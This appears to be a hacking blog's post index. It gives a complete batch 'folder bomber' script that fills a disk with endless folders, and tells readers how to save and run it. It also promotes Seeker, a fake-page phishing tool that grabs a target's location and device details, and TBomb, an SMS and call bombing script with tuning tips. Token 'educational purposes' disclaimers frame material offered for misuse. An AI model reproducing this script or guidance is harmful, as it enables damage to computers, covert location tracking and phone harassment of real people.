Skip to main content

Posts

Empty folder creator virus (How to create a folder Bomber virus)

Unlimited folders creator  Please note: Don't run this in your live computer system use virtual machine to practice.                    This virus when executed will start creating unlimited empty folders in your system until the memory runs out. 1) Open notepad and write the program  @echo off :hell md %random% goto hell 3) And save the file that .bat extension . Only for educational purposes.   1) That is seeker 2) how to do SMS and Call bombing using termux   3) how to make computer viruses  4) top most dangerous viruses  Enjoy guys 🤓

What is SEEKER

seeker - Accurately Locate Smartphones using Social Engineering .   Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites. Read more on thewhiteh4t's Blog .Seeker Hosts a fake website on In Built PHP Server and uses Serveo to generate a link which we will forward to the target, website asks for Location Permission and if the target allows it, we can get : ⭕️Longitude ⭕️Latitude ⭕️Accuracy ⭕️Altitude - Not always available ⭕️Direction - Only available if user is moving ⭕️Speed - Only available if user is moving Along with Location Information we also get Device Information without any permissions : ⭕️Operating System ⭕️Platform ⭕️Number of CPU Cores ⭕️Amount of RAM - Approximate Results ⭕️Screen Resolution ⭕️GPU information ⭕️Browser Name and Version ⭕️Public IP Address ⭕️IP Address Reconnaissance This tool is a Proof of Concept and is for Educational Purpose...

SMS bombing, Call Bombing, pranks with friends using termux app

  This is only for educational purposes Don't misuse it  The script requires working network connection to work. No balance will be deducted for using this script to send SMS/calls. While doing infinite bombing use 2-3 seconds delay and 10 to 20 threads for maximum performance. Don't put spaces in between phone number (Ex- 99999 99999) Make sure you are using the latest version of TBomb Make sure you are using Python3. $ python -V If output looks like Python 3 - Congrats, Python 3 is installed properly. 👉 Do not use this to harm others. 👉 This script is only for educational purposes or to prank. 👉 None of the developers/contributors are responsible for the misuse of TBomb. Features: 👉 Lots of integrated SMS/call APIs 👉 Unlimited (Limited against abusing) and super-fast bombing 👉 International bombing available (APIS Dead. Try Your Luck.) 👉 Call bombing 👉 Frequent updates 👉 Automatic updating mechanism 👉 Easy to use and embed in code        ...

Top most dangerous computer viruses 😮😮😲

  1. ILOVEYOU ILOVEYOU is  considered one of the most virulent computer virus ever created . It managed to wreck havoc on computer systems all over the world with around  $10 billion  worth of damages. 10% of the world’s computers were believed to have been infected. It was so bad that governments and large corporations took their  mailing system offline  to prevent infection.  The virus was created by two Filipino programers, Reonel Ramones and Onel de Guzman. What it did was  use social engineering to get people to click on the attachment ; in this case,  a love confession . The attachment was actually a script that poses as a TXT file, due to Windows at the time hiding the actual extension of the file. Once clicked, it will send itself to everyone in the user’s mailing list and proceed to overwrite files with itself, making the computer unbootable. The two were  never charged,  as there were no laws about malware.  This led ...

How to make computer viruses

 H ow  To Create Computer Virus In Few Seconds (Notepad virus tricks) Learn how to create a computer virus in less than 60 seconds: Almost every computer or laptop user has faced virus attack at least once in their life for sure, and we all know what is virus. Today we are going to describe five ways to create a virus in less than a minute. Go through the post to know about it. Today we are here with the method to Create a Virus in Less Than 60 seconds. Today in every second, a person is using a computer and almost every one of them knows about a virus. The virus is a malicious program that enters into the computer without your permission and can affect your data and operating system. Well, viruses are of different types as there are trojan horses and much more. However, have you ever thought about creating a virus? You can create one within seconds, and it is possible with some simple methods that I am going to discuss in this post. 1. Creating a Dangerous Virus Note.  ...